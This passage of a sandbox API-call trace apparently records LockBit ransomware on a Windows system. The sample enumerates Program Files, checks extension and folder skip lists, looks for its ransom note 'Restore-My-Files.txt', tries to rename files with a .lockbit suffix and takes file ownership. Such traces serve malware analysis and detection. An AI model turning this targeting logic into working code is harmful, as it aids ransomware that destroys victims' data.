lpString2=".dll") returned 1 [0076.895] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0076.895] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0076.895] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0076.895] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0076.895] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0076.895] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0076.895] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0076.895] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0076.895] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0076.895] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0076.895] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0076.895] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0076.895] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0076.895] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0076.895] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0076.895] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0076.895] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0076.895] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0076.895] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0076.896] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0076.896] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0076.896] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0076.896] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0076.896] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0076.896] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0076.896] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0076.896] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0076.896] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0076.896] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x181086f0, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x181086f0, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x588a4500, ftLastWriteTime.dwHighDateTime=0x1d0c595, nFileSizeHigh=0x0, nFileSizeLow=0xefec0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="ucrtbase.dll", cAlternateFileName="")) returned 1 [0076.896] lstrcmpiW (lpString1=".", lpString2="ucrtbase.dll") returned -1 [0076.896] lstrcmpiW (lpString1="..", lpString2="ucrtbase.dll") returned -1 [0076.896] PathFindExtensionW (pszPath="ucrtbase.dll") returned=".dll" [0076.896] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0076.896] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0076.896] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0076.896] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0076.896] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0076.896] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0076.896] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0076.896] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0076.896] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0076.896] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0076.896] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0076.896] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0076.896] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0076.897] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0076.897] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0076.897] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0076.897] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0076.897] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0076.897] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0076.897] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0076.897] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0076.897] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0076.897] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0076.897] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0076.897] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0076.897] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0076.897] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0076.897] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0076.897] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0076.897] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0076.897] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0076.897] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0076.897] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0076.897] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0076.897] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0076.897] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0076.897] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0076.897] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0076.897] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0076.897] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x181086f0, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x181086f0, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x588a4500, ftLastWriteTime.dwHighDateTime=0x1d0c595, nFileSizeHigh=0x0, nFileSizeLow=0x5f4b0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="vccorlib140.dll", cAlternateFileName="VCCORL~1.DLL")) returned 1 [0076.898] lstrcmpiW (lpString1=".", lpString2="vccorlib140.dll") returned -1 [0076.898] lstrcmpiW (lpString1="..", lpString2="vccorlib140.dll") returned -1 [0076.898] PathFindExtensionW (pszPath="vccorlib140.dll") returned=".dll" [0076.898] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0076.898] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0076.898] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0076.898] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0076.898] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0076.898] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0076.898] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0076.898] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0076.898] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0076.898] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0076.898] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0076.898] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0076.898] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0076.898] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0076.898] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0076.898] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0076.898] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0076.898] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0076.898] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0076.898] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0076.898] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0076.898] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0076.898] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0076.898] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0076.899] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0076.899] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0076.899] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0076.899] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0076.899] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0076.899] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0076.899] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0076.899] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0076.899] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0076.899] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0076.899] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0076.899] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0076.899] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0076.899] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0076.899] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0076.899] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1812e850, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x1812e850, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x588a4500, ftLastWriteTime.dwHighDateTime=0x1d0c595, nFileSizeHigh=0x0, nFileSizeLow=0x15ab0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="vcruntime140.dll", cAlternateFileName="VCRUNT~1.DLL")) returned 1 [0076.899] lstrcmpiW (lpString1=".", lpString2="vcruntime140.dll") returned -1 [0076.899] lstrcmpiW (lpString1="..", lpString2="vcruntime140.dll") returned -1 [0076.899] PathFindExtensionW (pszPath="vcruntime140.dll") returned=".dll" [0076.899] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0076.899] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0076.899] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0076.899] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0076.899] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0076.899] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0076.899] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0076.900] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0076.900] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0076.900] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0076.900] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0076.900] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0076.900] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0076.900] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0076.900] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0076.900] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0076.900] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0076.900] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0076.900] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0076.900] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0076.900] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0076.900] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0076.900] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0076.900] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0076.900] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0076.900] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0076.900] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0076.900] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0076.900] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0076.900] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0076.900] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0076.900] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0076.900] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0076.900] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0076.901] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0076.901] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0076.901] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0076.901] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0076.901] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0076.901] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1812e850, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x1812e850, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x588a4500, ftLastWriteTime.dwHighDateTime=0x1d0c595, nFileSizeHigh=0x0, nFileSizeLow=0x15ab0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="vcruntime140.dll", cAlternateFileName="VCRUNT~1.DLL")) returned 0 [0076.901] GetLastError () returned 0x12 [0076.901] FindClose (in: hFindFile=0x2e3250 | out: hFindFile=0x2e3250) returned 1 [0076.901] FindNextFileW (in: hFindFile=0x2e3210, lpFindFileData=0x344de88 | out: lpFindFileData=0x344de88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="ink", cAlternateFileName="")) returned 1 [0076.901] lstrcmpiW (lpString1=".", lpString2="ink") returned -1 [0076.901] lstrcmpiW (lpString1="..", lpString2="ink") returned -1 [0076.901] lstrcmpiW (lpString1="ink", lpString2="$windows.~bt") returned 1 [0076.901] lstrcmpiW (lpString1="ink", lpString2="intel") returned -1 [0076.901] lstrcmpiW (lpString1="ink", lpString2="msocache") returned -1 [0076.901] lstrcmpiW (lpString1="ink", lpString2="$recycle.bin") returned 1 [0076.901] lstrcmpiW (lpString1="ink", lpString2="$windows.~ws") returned 1 [0076.901] lstrcmpiW (lpString1="ink", lpString2="tor browser") returned -1 [0076.901] lstrcmpiW (lpString1="ink", lpString2="boot") returned 1 [0076.901] lstrcmpiW (lpString1="ink", lpString2="system volume information") returned -1 [0076.901] lstrcmpiW (lpString1="ink", lpString2="perflogs") returned -1 [0076.901] lstrcmpiW (lpString1="ink", lpString2="google") returned 1 [0076.901] lstrcmpiW (lpString1="ink", lpString2="application data") returned 1 [0076.902] lstrcmpiW (lpString1="ink", lpString2="windows") returned -1 [0076.902] lstrcmpiW (lpString1="ink", lpString2="windows.old") returned -1 [0076.902] lstrcmpiW (lpString1="ink", lpString2="appdata") returned 1 [0076.902] lstrcmpiW (lpString1="ink", lpString2="Windows nt") returned -1 [0076.902] lstrcmpiW (lpString1="ink", lpString2="Msbuild") returned -1 [0076.902] lstrcmpiW (lpString1="ink", lpString2="Microsoft") returned -1 [0076.902] lstrcmpiW (lpString1="ink", lpString2="All users") returned 1 [0076.902] lstrcmpiW (lpString1="ink", lpString2="mozilla") returned -1 [0076.902] wsprintfW (in: param_1=0x344d9a0, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 51 [0076.902] wsprintfW (in: param_1=0x344d200, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\*") returned 53 [0076.902] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\*"), fInfoLevelId=0x0, lpFindFileData=0x344d6e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344d6e8) returned 0x2e3250 [0076.902] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0076.902] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0076.902] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0076.902] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0076.902] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c2bbccc, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c2bbccc, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc1486, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="Alphabet.xml", cAlternateFileName="")) returned 1 [0076.902] lstrcmpiW (lpString1=".", lpString2="Alphabet.xml") returned -1 [0076.903] lstrcmpiW (lpString1="..", lpString2="Alphabet.xml") returned -1 [0076.903] PathFindExtensionW (pszPath="Alphabet.xml") returned=".xml" [0076.903] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0076.903] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0076.903] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0076.903] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0076.903] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0076.903] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0076.903] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0076.903] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0076.903] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0076.903] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0076.903] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0076.903] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0076.903] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0076.903] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0076.903] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0076.903] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0076.903] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0076.903] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0076.903] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0076.903] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0076.903] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0076.903] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0076.903] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0076.903] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0076.904] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0076.904] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0076.904] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0076.904] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0076.904] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0076.904] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0076.904] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0076.904] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0076.904] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0076.904] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0076.904] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0076.904] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0076.904] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0076.904] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0076.904] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0076.904] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0076.904] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0076.904] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0076.904] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0076.904] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0076.904] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0076.904] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0076.904] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0076.904] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Alphabet.xml") returned 1 [0076.904] lstrcmpiW (lpString1="ntldr", lpString2="Alphabet.xml") returned 1 [0076.904] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Alphabet.xml") returned 1 [0076.904] lstrcmpiW (lpString1="bootsect.bak", lpString2="Alphabet.xml") returned 1 [0076.905] lstrcmpiW (lpString1="autorun.inf", lpString2="Alphabet.xml") returned 1 [0076.905] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\") returned="" [0076.905] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned=".xml" [0076.905] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0076.905] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0076.905] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0076.905] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0076.905] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0076.905] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0076.905] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0076.905] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0076.905] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0076.905] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0076.905] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0076.905] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0076.905] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0076.905] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0076.905] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0076.905] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0076.905] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0076.905] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0076.905] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0076.905] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0076.905] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0076.905] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0076.905] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0076.906] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0076.906] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0076.906] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0076.906] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0076.906] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0076.906] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.lockbit") returned 72 [0076.906] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0076.906] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.lockbit")) returned 0 [0076.907] GetLastError () returned 0x5 [0076.908] GetModuleHandleA (lpModuleName="ntdll") returned 0x77150000 [0076.908] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0076.908] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0076.908] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0076.908] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0076.909] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0076.909] NtOpenFile (in: FileHandle=0x344cd68, DesiredAccess=0x80, ObjectAttributes=0x344cc18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344cc10, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344cd68*=0x3b0, IoStatusBlock=0x344cc10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0076.910] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0076.910] NtQueryInformationFile (in: FileHandle=0x3b0, IoStatusBlock=0x344cc30, FileInformation=0x344caf0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344cc30, FileInformation=0x344caf0) returned 0x0 [0076.956] NtClose (Handle=0x3b0) returned 0x0 [0076.956] RtlFreeAnsiString (AnsiString="\\") [0076.956] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344cda4 | out: TokenHandle=0x344cda4*=0x3b0) returned 1 [0076.956] malloc (_Size=0x200) returned 0x53fcc0 [0076.956] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344cda0 | out: TokenInformation=0x53fcc0, ReturnLength=0x344cda0) returned 1 [0076.956] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344cd88, dwRevision=0x1 | out: pSecurityDescriptor=0x344cd88) returned 1 [0076.956] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344cd88, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344cd88) returned 1 [0076.956] CloseHandle (hObject=0x3b0) returned 1 [0076.956] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344cd88) returned 1 [0076.957] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344cd88) returned 1 [0076.958] free (_Block=0x53fcc0) [0076.958] lstrcmpiW (lpString1=".xml", 